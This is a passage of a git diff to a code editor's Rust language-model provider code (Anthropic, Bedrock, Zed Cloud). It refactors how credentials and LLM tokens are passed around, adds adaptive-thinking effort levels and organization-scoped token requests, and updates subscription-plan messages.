ListBulletItem, prelude::*}; use ui_input::InputField; use util::ResultExt; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; pub use settings::AnthropicAvailableModel as AvailableModel; -const PROVIDER_ID: LanguageModelProviderId = language_model::ANTHROPIC_PROVIDER_ID; -const PROVIDER_NAME: LanguageModelProviderName = language_model::ANTHROPIC_PROVIDER_NAME; +const PROVIDER_ID: LanguageModelProviderId = ANTHROPIC_PROVIDER_ID; +const PROVIDER_NAME: LanguageModelProviderName = ANTHROPIC_PROVIDER_NAME; #[derive(Default, Clone, Debug, PartialEq)] pub struct AnthropicSettings { @@ -48,6 +52,7 @@ static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -56,30 +61,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = AnthropicLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = AnthropicLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl AnthropicLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); 
- this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -140,13 +166,10 @@ impl LanguageModelProvider for AnthropicLanguageModelProvider { } fn recommended_models(&self, _cx: &App) -> Vec> { - [ - anthropic::Model::ClaudeSonnet4_6, - anthropic::Model::ClaudeSonnet4_6Thinking, - ] - .into_iter() - .map(|model| self.create_language_model(model)) - .collect() + [anthropic::Model::ClaudeSonnet4_6] + .into_iter() + .map(|model| self.create_language_model(model)) + .collect() } fn provided_models(&self, cx: &App) -> Vec> { @@ -178,7 +201,12 @@ impl LanguageModelProvider for AnthropicLanguageModelProvider { max_output_tokens: model.max_output_tokens, default_temperature: model.default_temperature, extra_beta_headers: model.extra_beta_headers.clone(), - mode: model.mode.unwrap_or_default().into(), + mode: match model.mode.unwrap_or_default() { + settings::ModelMode::Default => AnthropicModelMode::Default, + settings::ModelMode::Thinking { budget_tokens } => { + AnthropicModelMode::Thinking { budget_tokens } + } + }, }, ); } @@ -356,10 +384,14 @@ pub fn into_anthropic_count_tokens_request( } else { Some(anthropic::StringOrContents::String(system_message)) }, - thinking: if request.thinking_allowed - && let AnthropicModelMode::Thinking { budget_tokens } = mode - { - Some(anthropic::Thinking::Enabled { budget_tokens }) + thinking: if request.thinking_allowed { + match mode { + AnthropicModelMode::Thinking { budget_tokens } => { + Some(anthropic::Thinking::Enabled { budget_tokens }) + } + AnthropicModelMode::AdaptiveThinking => Some(anthropic::Thinking::Adaptive), + AnthropicModelMode::Default => None, + } } else { None }, @@ -517,7 +549,36 @@ impl LanguageModel for AnthropicModel { 
} fn supports_thinking(&self) -> bool { - matches!(self.model.mode(), AnthropicModelMode::Thinking { .. }) + self.model.supports_thinking() + } + + fn supported_effort_levels(&self) -> Vec { + if self.model.supports_adaptive_thinking() { + vec![ + language_model::LanguageModelEffortLevel { + name: "Low".into(), + value: "low".into(), + is_default: false, + }, + language_model::LanguageModelEffortLevel { + name: "Medium".into(), + value: "medium".into(), + is_default: false, + }, + language_model::LanguageModelEffortLevel { + name: "High".into(), + value: "high".into(), + is_default: true, + }, + language_model::LanguageModelEffortLevel { + name: "Max".into(), + value: "max".into(), + is_default: false, + }, + ] + } else { + Vec::new() + } } fn telemetry_id(&self) -> String { @@ -700,10 +761,14 @@ pub fn into_anthropic( } else { Some(anthropic::StringOrContents::String(system_message)) }, - thinking: if request.thinking_allowed - && let AnthropicModelMode::Thinking { budget_tokens } = mode - { - Some(anthropic::Thinking::Enabled { budget_tokens }) + thinking: if request.thinking_allowed { + match mode { + AnthropicModelMode::Thinking { budget_tokens } => { + Some(anthropic::Thinking::Enabled { budget_tokens }) + } + AnthropicModelMode::AdaptiveThinking => Some(anthropic::Thinking::Adaptive), + AnthropicModelMode::Default => None, + } } else { None }, @@ -723,7 +788,24 @@ pub fn into_anthropic( LanguageModelToolChoice::None => anthropic::ToolChoice::None, }), metadata: None, - output_config: None, + output_config: if request.thinking_allowed + && matches!(mode, AnthropicModelMode::AdaptiveThinking) + { + request.thinking_effort.as_deref().and_then(|effort| { + let effort = match effort { + "low" => Some(anthropic::Effort::Low), + "medium" => Some(anthropic::Effort::Medium), + "high" => Some(anthropic::Effort::High), + "max" => Some(anthropic::Effort::Max), + _ => None, + }; + effort.map(|effort| anthropic::OutputConfig { + effort: Some(effort), + }) + }) + } else { + 
None + }, stop_sequences: Vec::new(), speed: request.speed.map(From::from), temperature: request.temperature.or(Some(default_temperature)), @@ -817,9 +899,9 @@ impl AnthropicEventMapper { // valid JSON that serde can accept, e.g. by closing // unclosed delimiters. This way, we can update the // UI with whatever has been streamed back so far. - if let Ok(input) = serde_json::Value::from_str( - &partial_json_fixer::fix_json(&tool_use.input_json), - ) { + if let Ok(input) = + serde_json::Value::from_str(&fix_streamed_json(&tool_use.input_json)) + { return vec![Ok(LanguageModelCompletionEvent::ToolUse( LanguageModelToolUse { id: tool_use.id.clone().into(), diff --git a/crates/language_model/src/telemetry.rs b/crates/language_models/src/provider/anthropic/telemetry.rs similarity index 95% rename from crates/language_model/src/telemetry.rs rename to crates/language_models/src/provider/anthropic/telemetry.rs index 6d7f4df7f644115cae7b2148f4d78fde19674344..75fb11a81b479635ea02db77a2df8a769e795e01 100644 --- a/crates/language_model/src/telemetry.rs +++ b/crates/language_models/src/provider/anthropic/telemetry.rs @@ -1,8 +1,8 @@ -use crate::ANTHROPIC_PROVIDER_ID; use anthropic::ANTHROPIC_API_URL; use anyhow::{Context as _, anyhow}; use gpui::BackgroundExecutor; use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest}; +use language_model::{ANTHROPIC_PROVIDER_ID, LanguageModel}; use std::env; use std::sync::Arc; use util::ResultExt; @@ -52,7 +52,7 @@ impl AnthropicEventType { } pub fn report_anthropic_event( - model: &Arc, + model: &Arc, event: AnthropicEventData, cx: &gpui::App, ) { @@ -69,7 +69,7 @@ pub struct AnthropicEventReporter { } impl AnthropicEventReporter { - pub fn new(model: &Arc, cx: &gpui::App) -> Self { + pub fn new(model: &Arc, cx: &gpui::App) -> Self { Self { http_client: cx.http_client(), executor: cx.background_executor().clone(), diff --git a/crates/language_models/src/provider/bedrock.rs b/crates/language_models/src/provider/bedrock.rs 
index bcf8401c1c14ae1a74bb7136141d0b35509cdd40..4320763e2c5c6de7f3fe9238d7a4991565c3bfcd 100644 --- a/crates/language_models/src/provider/bedrock.rs +++ b/crates/language_models/src/provider/bedrock.rs @@ -48,7 +48,7 @@ use ui_input::InputField; use util::ResultExt; use crate::AllLanguageModelSettings; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; actions!(bedrock, [Tab, TabPrev]); @@ -195,12 +195,13 @@ pub struct State { settings: Option, /// Whether credentials came from environment variables (only relevant for static credentials) credentials_from_env: bool, + credentials_provider: Arc, _subscription: Subscription, } impl State { fn reset_auth(&self, cx: &mut Context) -> Task> { - let credentials_provider = ::global(cx); + let credentials_provider = self.credentials_provider.clone(); cx.spawn(async move |this, cx| { credentials_provider .delete_credentials(AMAZON_AWS_URL, cx) @@ -220,7 +221,7 @@ impl State { cx: &mut Context, ) -> Task> { let auth = credentials.clone().into_auth(); - let credentials_provider = ::global(cx); + let credentials_provider = self.credentials_provider.clone(); cx.spawn(async move |this, cx| { credentials_provider .write_credentials( @@ -287,7 +288,7 @@ impl State { &self, cx: &mut Context, ) -> Task> { - let credentials_provider = ::global(cx); + let credentials_provider = self.credentials_provider.clone(); cx.spawn(async move |this, cx| { // Try environment variables first let (auth, from_env) = if let Some(bearer_token) = &ZED_BEDROCK_BEARER_TOKEN_VAR.value { @@ -344,7 +345,7 @@ impl State { .ok_or(AuthenticateError::CredentialsNotFound)?; let credentials_str = String::from_utf8(credentials_bytes) - .context("invalid {PROVIDER_NAME} credentials")?; + .with_context(|| format!("invalid {PROVIDER_NAME} credentials"))?; let credentials: BedrockCredentials = serde_json::from_str(&credentials_str).context("failed to parse credentials")?; @@ -400,11 +401,16 @@ pub 
struct BedrockLanguageModelProvider { } impl BedrockLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| State { auth: None, settings: Some(AllLanguageModelSettings::get_global(cx).bedrock.clone()), credentials_from_env: false, + credentials_provider, _subscription: cx.observe_global::(|_, cx| { cx.notify(); }), @@ -642,10 +648,36 @@ impl LanguageModel for BedrockModel { } fn supports_thinking(&self) -> bool { - matches!( - self.model.mode(), - BedrockModelMode::Thinking { .. } | BedrockModelMode::AdaptiveThinking { .. } - ) + self.model.supports_thinking() + } + + fn supported_effort_levels(&self) -> Vec { + if self.model.supports_adaptive_thinking() { + vec![ + language_model::LanguageModelEffortLevel { + name: "Low".into(), + value: "low".into(), + is_default: false, + }, + language_model::LanguageModelEffortLevel { + name: "Medium".into(), + value: "medium".into(), + is_default: false, + }, + language_model::LanguageModelEffortLevel { + name: "High".into(), + value: "high".into(), + is_default: true, + }, + language_model::LanguageModelEffortLevel { + name: "Max".into(), + value: "max".into(), + is_default: false, + }, + ] + } else { + Vec::new() + } } fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { @@ -658,6 +690,10 @@ impl LanguageModel for BedrockModel { } } + fn supports_streaming_tools(&self) -> bool { + true + } + fn telemetry_id(&self) -> String { format!("bedrock/{}", self.model.id()) } @@ -714,7 +750,7 @@ impl LanguageModel for BedrockModel { model_id, self.model.default_temperature(), self.model.max_output_tokens(), - self.model.mode(), + self.model.thinking_mode(), self.model.supports_caching(), self.model.supports_tool_use(), use_extended_context, @@ -807,7 +843,7 @@ pub fn into_bedrock( model: String, default_temperature: f32, max_output_tokens: u64, - mode: BedrockModelMode, + 
thinking_mode: BedrockModelMode, supports_caching: bool, supports_tool_use: bool, allow_extended_context: bool, @@ -1081,11 +1117,24 @@ pub fn into_bedrock( system: Some(system_message), tools: tool_config, thinking: if request.thinking_allowed { - match mode { + match thinking_mode { BedrockModelMode::Thinking { budget_tokens } => { Some(bedrock::Thinking::Enabled { budget_tokens }) } - BedrockModelMode::AdaptiveThinking { effort } => { + BedrockModelMode::AdaptiveThinking { + effort: default_effort, + } => { + let effort = request + .thinking_effort + .as_deref() + .and_then(|e| match e { + "low" => Some(bedrock::BedrockAdaptiveThinkingEffort::Low), + "medium" => Some(bedrock::BedrockAdaptiveThinkingEffort::Medium), + "high" => Some(bedrock::BedrockAdaptiveThinkingEffort::High), + "max" => Some(bedrock::BedrockAdaptiveThinkingEffort::Max), + _ => None, + }) + .unwrap_or(default_effort); Some(bedrock::Thinking::Adaptive { effort }) } BedrockModelMode::Default => None, @@ -1200,8 +1249,25 @@ pub fn map_to_language_model_completion_events( .get_mut(&cb_delta.content_block_index) { tool_use.input_json.push_str(tool_output.input()); + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&tool_use.input_json), + ) { + Some(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: tool_use.id.clone().into(), + name: tool_use.name.clone().into(), + is_input_complete: false, + raw_input: tool_use.input_json.clone(), + input, + thought_signature: None, + }, + ))) + } else { + None + } + } else { + None } - None } Some(ContentBlockDelta::ReasoningContent(thinking)) => match thinking { ReasoningContentBlockDelta::Text(thoughts) => { @@ -1553,7 +1619,8 @@ impl Render for ConfigurationView { } v_flex() - .size_full() + .min_w_0() + .w_full() .track_focus(&self.focus_handle) .on_action(cx.listener(Self::on_tab)) .on_action(cx.listener(Self::on_tab_prev)) diff --git a/crates/language_models/src/provider/cloud.rs 
b/crates/language_models/src/provider/cloud.rs index 19009013bf84ad9751e9ed0de2d3338b279a258e..29623cc998ad0fe933e9a29c45c651f7be010b07 100644 --- a/crates/language_models/src/provider/cloud.rs +++ b/crates/language_models/src/provider/cloud.rs @@ -1,9 +1,10 @@ use ai_onboarding::YoungAccountBanner; use anthropic::AnthropicModelMode; use anyhow::{Context as _, Result, anyhow}; -use chrono::{DateTime, Utc}; -use client::{Client, UserStore, zed_urls}; -use cloud_api_types::Plan; +use client::{ + Client, NeedsLlmTokenRefresh, RefreshLlmTokenListener, UserStore, global_llm_token, zed_urls, +}; +use cloud_api_types::{OrganizationId, Plan}; use cloud_llm_client::{ CLIENT_SUPPORTS_STATUS_MESSAGES_HEADER_NAME, CLIENT_SUPPORTS_STATUS_STREAM_ENDED_HEADER_NAME, CLIENT_SUPPORTS_X_AI_HEADER_NAME, CompletionBody, CompletionEvent, CompletionRequestStatus, @@ -20,12 +21,14 @@ use gpui::{AnyElement, AnyView, App, AsyncApp, Context, Entity, Subscription, Ta use http_client::http::{HeaderMap, HeaderValue}; use http_client::{AsyncBody, HttpClient, HttpRequestExt, Method, Response, StatusCode}; use language_model::{ - AuthenticateError, IconOrSvg, LanguageModel, LanguageModelCacheConfiguration, + ANTHROPIC_PROVIDER_ID, ANTHROPIC_PROVIDER_NAME, AuthenticateError, GOOGLE_PROVIDER_ID, + GOOGLE_PROVIDER_NAME, IconOrSvg, LanguageModel, LanguageModelCacheConfiguration, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelEffortLevel, LanguageModelId, LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, - LanguageModelToolChoice, LanguageModelToolSchemaFormat, LlmApiToken, NeedsLlmTokenRefresh, - PaymentRequiredError, RateLimiter, RefreshLlmTokenListener, + LanguageModelToolChoice, LanguageModelToolSchemaFormat, LlmApiToken, OPEN_AI_PROVIDER_ID, + OPEN_AI_PROVIDER_NAME, PaymentRequiredError, RateLimiter, X_AI_PROVIDER_ID, X_AI_PROVIDER_NAME, + ZED_CLOUD_PROVIDER_ID, 
ZED_CLOUD_PROVIDER_NAME, }; use release_channel::AppVersion; use schemars::JsonSchema; @@ -43,7 +46,6 @@ use std::task::Poll; use std::time::Duration; use thiserror::Error; use ui::{TintColor, prelude::*}; -use util::{ResultExt as _, maybe}; use crate::provider::anthropic::{ AnthropicEventMapper, count_anthropic_tokens_with_tiktoken, into_anthropic, @@ -55,8 +57,8 @@ use crate::provider::open_ai::{ }; use crate::provider::x_ai::count_xai_tokens; -const PROVIDER_ID: LanguageModelProviderId = language_model::ZED_CLOUD_PROVIDER_ID; -const PROVIDER_NAME: LanguageModelProviderName = language_model::ZED_CLOUD_PROVIDER_NAME; +const PROVIDER_ID: LanguageModelProviderId = ZED_CLOUD_PROVIDER_ID; +const PROVIDER_NAME: LanguageModelProviderName = ZED_CLOUD_PROVIDER_NAME; #[derive(Default, Clone, Debug, PartialEq)] pub struct ZedDotDevSettings { @@ -97,7 +99,7 @@ pub struct State { default_model: Option>, default_fast_model: Option>, recommended_models: Vec>, - _fetch_models_task: Task<()>, + _user_store_subscription: Subscription, _settings_subscription: Subscription, _llm_token_subscription: Subscription, } @@ -110,34 +112,42 @@ impl State { cx: &mut Context, ) -> Self { let refresh_llm_token_listener = RefreshLlmTokenListener::global(cx); - let mut current_user = user_store.read(cx).watch_current_user(); + let llm_api_token = global_llm_token(cx); Self { client: client.clone(), - llm_api_token: LlmApiToken::default(), - user_store, + llm_api_token, + user_store: user_store.clone(), status, models: Vec::new(), default_model: None, default_fast_model: None, recommended_models: Vec::new(), - _fetch_models_task: cx.spawn(async move |this, cx| { - maybe!(async move { - let (client, llm_api_token) = this - .read_with(cx, |this, _cx| (client.clone(), this.llm_api_token.clone()))?; + _user_store_subscription: cx.subscribe( + &user_store, + move |this, _user_store, event, cx| match event { + client::user::Event::PrivateUserInfoUpdated => { + let status = *client.status().borrow(); + 
if status.is_signed_out() { + return; + } - while current_user.borrow().is_none() { - current_user.next().await; + let client = this.client.clone(); + let llm_api_token = this.llm_api_token.clone(); + let organization_id = this + .user_store + .read(cx) + .current_organization() + .map(|organization| organization.id.clone()); + cx.spawn(async move |this, cx| { + let response = + Self::fetch_models(client, llm_api_token, organization_id).await?; + this.update(cx, |this, cx| this.update_models(response, cx)) + }) + .detach_and_log_err(cx); } - - let response = - Self::fetch_models(client.clone(), llm_api_token.clone()).await?; - this.update(cx, |this, cx| this.update_models(response, cx))?; - anyhow::Ok(()) - }) - .await - .context("failed to fetch Zed models") - .log_err(); - }), + _ => {} + }, + ), _settings_subscription: cx.observe_global::(|_, cx| { cx.notify(); }), @@ -146,9 +156,14 @@ impl State { move |this, _listener, _event, cx| { let client = this.client.clone(); let llm_api_token = this.llm_api_token.clone(); + let organization_id = this + .user_store + .read(cx) + .current_organization() + .map(|organization| organization.id.clone()); cx.spawn(async move |this, cx| { - llm_api_token.refresh(&client).await?; - let response = Self::fetch_models(client, llm_api_token).await?; + let response = + Self::fetch_models(client, llm_api_token, organization_id).await?; this.update(cx, |this, cx| { this.update_models(response, cx); }) @@ -209,9 +224,12 @@ impl State { async fn fetch_models( client: Arc, llm_api_token: LlmApiToken, + organization_id: Option, ) -> Result { let http_client = &client.http_client(); - let token = llm_api_token.acquire(&client).await?; + let token = client + .acquire_llm_token(&llm_api_token, organization_id) + .await?; let request = http_client::Request::builder() .method(Method::GET) @@ -273,11 +291,13 @@ impl CloudLanguageModelProvider { &self, model: Arc, llm_api_token: LlmApiToken, + user_store: Entity, ) -> Arc { 
Arc::new(CloudLanguageModel { id: LanguageModelId(SharedString::from(model.id.0.clone())), model, llm_api_token, + user_store, client: self.client.clone(), request_limiter: RateLimiter::new(4), }) @@ -306,36 +326,46 @@ impl LanguageModelProvider for CloudLanguageModelProvider { } fn default_model(&self, cx: &App) -> Option> { - let default_model = self.state.read(cx).default_model.clone()?; - let llm_api_token = self.state.read(cx).llm_api_token.clone(); - Some(self.create_language_model(default_model, llm_api_token)) + let state = self.state.read(cx); + let default_model = state.default_model.clone()?; + let llm_api_token = state.llm_api_token.clone(); + let user_store = state.user_store.clone(); + Some(self.create_language_model(default_model, llm_api_token, user_store)) } fn default_fast_model(&self, cx: &App) -> Option> { - let default_fast_model = self.state.read(cx).default_fast_model.clone()?; - let llm_api_token = self.state.read(cx).llm_api_token.clone(); - Some(self.create_language_model(default_fast_model, llm_api_token)) + let state = self.state.read(cx); + let default_fast_model = state.default_fast_model.clone()?; + let llm_api_token = state.llm_api_token.clone(); + let user_store = state.user_store.clone(); + Some(self.create_language_model(default_fast_model, llm_api_token, user_store)) } fn recommended_models(&self, cx: &App) -> Vec> { - let llm_api_token = self.state.read(cx).llm_api_token.clone(); - self.state - .read(cx) + let state = self.state.read(cx); + let llm_api_token = state.llm_api_token.clone(); + let user_store = state.user_store.clone(); + state .recommended_models .iter() .cloned() - .map(|model| self.create_language_model(model, llm_api_token.clone())) + .map(|model| { + self.create_language_model(model, llm_api_token.clone(), user_store.clone()) + }) .collect() } fn provided_models(&self, cx: &App) -> Vec> { - let llm_api_token = self.state.read(cx).llm_api_token.clone(); - self.state - .read(cx) + let state = self.state.read(cx); 
+ let llm_api_token = state.llm_api_token.clone(); + let user_store = state.user_store.clone(); + state .models .iter() .cloned() - .map(|model| self.create_language_model(model, llm_api_token.clone())) + .map(|model| { + self.create_language_model(model, llm_api_token.clone(), user_store.clone()) + }) .collect() } @@ -367,6 +397,7 @@ pub struct CloudLanguageModel { id: LanguageModelId, model: Arc, llm_api_token: LlmApiToken, + user_store: Entity, client: Arc, request_limiter: RateLimiter, } @@ -380,12 +411,15 @@ impl CloudLanguageModel { async fn perform_llm_completion( client: Arc, llm_api_token: LlmApiToken, + organization_id: Option, app_version: Option, body: CompletionBody, ) -> Result { let http_client = &client.http_client(); - let mut token = llm_api_token.acquire(&client).await?; + let mut token = client + .acquire_llm_token(&llm_api_token, organization_id.clone()) + .await?; let mut refreshed_token = false; loop { @@ -416,7 +450,9 @@ impl CloudLanguageModel { } if !refreshed_token && response.needs_llm_token_refresh() { - token = llm_api_token.refresh(&client).await?; + token = client + .refresh_llm_token(&llm_api_token, organization_id.clone()) + .await?; refreshed_token = true; continue; } @@ -538,20 +574,20 @@ impl LanguageModel for CloudLanguageModel { fn upstream_provider_id(&self) -> LanguageModelProviderId { use cloud_llm_client::LanguageModelProvider::*; match self.model.provider { - Anthropic => language_model::ANTHROPIC_PROVIDER_ID, - OpenAi => language_model::OPEN_AI_PROVIDER_ID, - Google => language_model::GOOGLE_PROVIDER_ID, - XAi => language_model::X_AI_PROVIDER_ID, + Anthropic => ANTHROPIC_PROVIDER_ID, + OpenAi => OPEN_AI_PROVIDER_ID, + Google => GOOGLE_PROVIDER_ID, + XAi => X_AI_PROVIDER_ID, } } fn upstream_provider_name(&self) -> LanguageModelProviderName { use cloud_llm_client::LanguageModelProvider::*; match self.model.provider { - Anthropic => language_model::ANTHROPIC_PROVIDER_NAME, - OpenAi => language_model::OPEN_AI_PROVIDER_NAME, 
- Google => language_model::GOOGLE_PROVIDER_NAME, - XAi => language_model::X_AI_PROVIDER_NAME, + Anthropic => ANTHROPIC_PROVIDER_NAME, + OpenAi => OPEN_AI_PROVIDER_NAME, + Google => GOOGLE_PROVIDER_NAME, + XAi => X_AI_PROVIDER_NAME, } } @@ -601,7 +637,7 @@ impl LanguageModel for CloudLanguageModel { fn supports_split_token_display(&self) -> bool { use cloud_llm_client::LanguageModelProvider::*; - matches!(self.model.provider, OpenAi) + matches!(self.model.provider, OpenAi | XAi) } fn telemetry_id(&self) -> String { @@ -611,11 +647,11 @@ impl LanguageModel for CloudLanguageModel { fn tool_input_format(&self) -> LanguageModelToolSchemaFormat { match self.model.provider { cloud_llm_client::LanguageModelProvider::Anthropic - | cloud_llm_client::LanguageModelProvider::OpenAi - | cloud_llm_client::LanguageModelProvider::XAi => { + | cloud_llm_client::LanguageModelProvider::OpenAi => { LanguageModelToolSchemaFormat::JsonSchema } - cloud_llm_client::LanguageModelProvider::Google => { + cloud_llm_client::LanguageModelProvider::Google + | cloud_llm_client::LanguageModelProvider::XAi => { LanguageModelToolSchemaFormat::JsonSchemaSubset } } @@ -670,12 +706,19 @@ impl LanguageModel for CloudLanguageModel { cloud_llm_client::LanguageModelProvider::Google => { let client = self.client.clone(); let llm_api_token = self.llm_api_token.clone(); + let organization_id = self + .user_store + .read(cx) + .current_organization() + .map(|organization| organization.id.clone()); let model_id = self.model.id.to_string(); let generate_content_request = into_google(request, model_id.clone(), GoogleModelMode::Default); async move { let http_client = &client.http_client(); - let token = llm_api_token.acquire(&client).await?; + let token = client + .acquire_llm_token(&llm_api_token, organization_id) + .await?; let request_body = CountTokensBody { provider: cloud_llm_client::LanguageModelProvider::Google, @@ -734,8 +777,14 @@ impl LanguageModel for CloudLanguageModel { > { let thread_id = 
request.thread_id.clone(); let prompt_id = request.prompt_id.clone(); - let intent = request.intent; let app_version = Some(cx.update(|cx| AppVersion::global(cx))); + let user_store = self.user_store.clone(); + let organization_id = cx.update(|cx| { + user_store + .read(cx) + .current_organization() + .map(|organization| organization.id.clone()) + }); let thinking_allowed = request.thinking_allowed; let enable_thinking = thinking_allowed && self.model.supports_thinking; let provider_name = provider_name(&self.model.provider); @@ -767,6 +816,7 @@ impl LanguageModel for CloudLanguageModel { let client = self.client.clone(); let llm_api_token = self.llm_api_token.clone(); + let organization_id = organization_id.clone(); let future = self.request_limiter.stream(async move { let PerformLlmCompletionResponse { response, @@ -774,11 +824,11 @@ impl LanguageModel for CloudLanguageModel { } = Self::perform_llm_completion( client.clone(), llm_api_token, + organization_id, app_version, CompletionBody { thread_id, prompt_id, - intent, provider: cloud_llm_client::LanguageModelProvider::Anthropic, model: request.model.clone(), provider_request: serde_json::to_value(&request) @@ -803,6 +853,7 @@ impl LanguageModel for CloudLanguageModel { cloud_llm_client::LanguageModelProvider::OpenAi => { let client = self.client.clone(); let llm_api_token = self.llm_api_token.clone(); + let organization_id = organization_id.clone(); let effort = request .thinking_effort .as_ref() @@ -818,7 +869,10 @@ impl LanguageModel for CloudLanguageModel { ); if enable_thinking && let Some(effort) = effort { - request.reasoning = Some(open_ai::responses::ReasoningConfig { effort }); + request.reasoning = Some(open_ai::responses::ReasoningConfig { + effort, + summary: Some(open_ai::responses::ReasoningSummaryMode::Auto), + }); } let future = self.request_limiter.stream(async move { @@ -828,11 +882,11 @@ impl LanguageModel for CloudLanguageModel { } = Self::perform_llm_completion( client.clone(), 
llm_api_token, + organization_id, app_version, CompletionBody { thread_id, prompt_id, - intent, provider: cloud_llm_client::LanguageModelProvider::OpenAi, model: request.model.clone(), provider_request: serde_json::to_value(&request) @@ -861,6 +915,7 @@ impl LanguageModel for CloudLanguageModel { None, ); let llm_api_token = self.llm_api_token.clone(); + let organization_id = organization_id.clone(); let future = self.request_limiter.stream(async move { let PerformLlmCompletionResponse { response, @@ -868,11 +923,11 @@ impl LanguageModel for CloudLanguageModel { } = Self::perform_llm_completion( client.clone(), llm_api_token, + organization_id, app_version, CompletionBody { thread_id, prompt_id, - intent, provider: cloud_llm_client::LanguageModelProvider::XAi, model: request.model.clone(), provider_request: serde_json::to_value(&request) @@ -902,11 +957,11 @@ impl LanguageModel for CloudLanguageModel { } = Self::perform_llm_completion( client.clone(), llm_api_token, + organization_id, app_version, CompletionBody { thread_id, prompt_id, - intent, provider: cloud_llm_client::LanguageModelProvider::Google, model: request.model.model_id.clone(), provider_request: serde_json::to_value(&request) @@ -1000,12 +1055,10 @@ where fn provider_name(provider: &cloud_llm_client::LanguageModelProvider) -> LanguageModelProviderName { match provider { - cloud_llm_client::LanguageModelProvider::Anthropic => { - language_model::ANTHROPIC_PROVIDER_NAME - } - cloud_llm_client::LanguageModelProvider::OpenAi => language_model::OPEN_AI_PROVIDER_NAME, - cloud_llm_client::LanguageModelProvider::Google => language_model::GOOGLE_PROVIDER_NAME, - cloud_llm_client::LanguageModelProvider::XAi => language_model::X_AI_PROVIDER_NAME, + cloud_llm_client::LanguageModelProvider::Anthropic => ANTHROPIC_PROVIDER_NAME, + cloud_llm_client::LanguageModelProvider::OpenAi => OPEN_AI_PROVIDER_NAME, + cloud_llm_client::LanguageModelProvider::Google => GOOGLE_PROVIDER_NAME, + 
cloud_llm_client::LanguageModelProvider::XAi => X_AI_PROVIDER_NAME, } } @@ -1038,7 +1091,6 @@ fn response_lines( struct ZedAiConfiguration { is_connected: bool, plan: Option, - subscription_period: Option<(DateTime, DateTime)>, eligible_for_trial: bool, account_too_young: bool, sign_in_callback: Arc, @@ -1046,33 +1098,37 @@ struct ZedAiConfiguration { impl RenderOnce for ZedAiConfiguration { fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement { - let is_pro = self.plan.is_some_and(|plan| plan == Plan::ZedPro); - let subscription_text = match (self.plan, self.subscription_period) { - (Some(Plan::ZedPro), Some(_)) => { - "You have access to Zed's hosted models through your Pro subscription." - } - (Some(Plan::ZedProTrial), Some(_)) => { - "You have access to Zed's hosted models through your Pro trial." - } - (Some(Plan::ZedFree), Some(_)) => { - if self.eligible_for_trial { - "Subscribe for access to Zed's hosted models. Start with a 14 day free trial." - } else { - "Subscribe for access to Zed's hosted models." - } - } - _ => { + let (subscription_text, has_paid_plan) = match self.plan { + Some(Plan::ZedPro) => ( + "You have access to Zed's hosted models through your Pro subscription.", + true, + ), + Some(Plan::ZedProTrial) => ( + "You have access to Zed's hosted models through your Pro trial.", + false, + ), + Some(Plan::ZedStudent) => ( + "You have access to Zed's hosted models through your Student subscription.", + true, + ), + Some(Plan::ZedBusiness) => ( + "You have access to Zed's hosted models through your Organization.", + true, + ), + Some(Plan::ZedFree) | None => ( if self.eligible_for_trial { "Subscribe for access to Zed's hosted models. Start with a 14 day free trial." } else { "Subscribe for access to Zed's hosted models." 
- } - } + }, + false, + ), }; - let manage_subscription_buttons = if is_pro { + let manage_subscription_buttons = if has_paid_plan { Button::new("manage_settings", "Manage Subscription") .full_width() + .label_size(LabelSize::Small) .style(ButtonStyle::Tinted(TintColor::Accent)) .on_click(|_, _, cx| cx.open_url(&zed_urls::account_url(cx))) .into_any_element() @@ -1096,10 +1152,7 @@ impl RenderOnce for ZedAiConfiguration { .child(Label::new("Sign in to have access to Zed's complete agentic experience with hosted models.")) .child( Button::new("sign_in", "Sign In to use Zed AI") - .icon_color(Color::Muted) - .icon(IconName::Github) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) + .start_icon(Icon::new(IconName::Github).size(IconSize::Small).color(Color::Muted)) .full_width() .on_click({ let callback = self.sign_in_callback.clone(); @@ -1156,7 +1209,6 @@ impl Render for ConfigurationView { ZedAiConfiguration { is_connected: !state.is_signed_out(cx), plan: user_store.plan(), - subscription_period: user_store.subscription_period(), eligible_for_trial: user_store.trial_started_at().is_none(), account_too_young: user_store.account_too_young(), sign_in_callback: self.sign_in_callback.clone(), @@ -1187,9 +1239,6 @@ impl Component for ZedAiConfiguration { 